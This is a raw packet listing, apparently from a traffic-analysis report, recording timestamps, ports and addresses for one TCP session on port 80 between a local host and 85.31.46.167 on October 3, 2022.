Oct 3, 2022 17:42:32.738132954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738143921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738161087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738168955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738189936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738195896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738217115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738224983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738245010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738250971 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738272905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738276005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738300085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738337040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738343000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738363981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738368988 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738390923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738425970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738430977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738451958 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738461018 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738480091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738487959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738506079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738512993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738533974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738538980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738560915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738567114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738589048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738594055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738615036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738626957 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738641977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738652945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738668919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738677025 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738697052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738702059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738723993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738734961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738750935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738759041 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738776922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738785028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738806009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738811016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738840103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.765947104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766000986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766047001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766103983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766110897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766158104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766202927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766243935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766262054 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766307116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766339064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766359091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766386986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766402960 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766415119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766453981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766459942 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766500950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766529083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766555071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766571045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766582966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766609907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766673088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766678095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766700983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766736031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766736984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766779900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766788006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766813040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766844034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766853094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766911030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766952038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.766992092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.766994953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767028093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767061949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767067909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767097950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767100096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767136097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767194986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767229080 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767266035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767270088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767302036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767304897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767333031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767374039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767404079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767406940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767441034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767481089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767509937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767512083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767544985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767585993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767616034 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767617941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767648935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767688990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767719030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767721891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767754078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767793894 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767823935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767824888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767858028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767898083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767927885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.767929077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.767961025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.768002033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.768030882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.768030882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.768902063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:33.028405905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:33.028554916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:33.520502090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:33.520653009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:34.480392933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:34.481448889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.416429996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.418536901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.443797112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.443873882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.443886995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.443908930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.443975925 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.444114923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.445911884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.445971966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446013927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446055889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446084976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.446096897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446137905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.446139097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446166039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.446183920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.446221113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.446253061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471158981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471220016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471265078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471281052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471308947 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471335888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471354961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471355915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471380949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471400023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.471420050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.471466064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473253012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473315001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473346949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473375082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473376989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473419905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473462105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473494053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473501921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473541975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473545074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473584890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473623991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473637104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473658085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473674059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473695993 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473701000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473741055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473752975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473797083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473798037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473834991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473839045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.473891973 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.473974943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.498565912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498624086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498667002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498708963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498749018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498778105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.498790979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498835087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498838902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.498888016 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.498898983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498946905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.498946905 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.498990059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.499025106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.499027967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.499229908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.500910044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.500965118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501004934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501048088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501084089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501087904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501136065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501161098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501162052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501200914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501204014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501245022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501285076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501286030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501327038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501329899 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501368046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501370907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501410961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501413107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501455069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501494884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501529932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501533985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501574993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501615047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501655102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501660109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501660109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501696110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501735926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501739025 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501775026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501775980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501816034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501820087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501857042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501857042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501898050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501938105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.501940012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501977921 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.501977921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.502024889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.502063990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.502068996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.502068996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.502103090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.502218962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526216030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526276112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526316881 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526360989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526396036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526401997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526396036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526456118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526462078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526499033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526503086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526540041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526556969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526557922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526582956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526623964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526632071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526632071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526665926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526684046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526715040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526726007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526737928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526778936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526779890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526819944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526832104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526863098 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526897907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526945114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526954889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.526992083 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.526995897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.527036905 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.527038097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.527055979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.527079105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.527097940 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.527120113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.527137995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.527183056 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529212952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529274940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529319048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529334068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529334068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529375076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529391050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529395103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529438019 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529438972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529457092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529488087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529505968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529512882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529556036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529560089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529597998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529619932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529639959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529659033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529680967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529699087 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529736042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529756069 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529778957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529797077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529804945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529846907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529851913 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529890060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529911995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529911995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529933929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:35.529951096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:35.529975891 CEST	80	49711	85.31.46.167	192.168.2.6
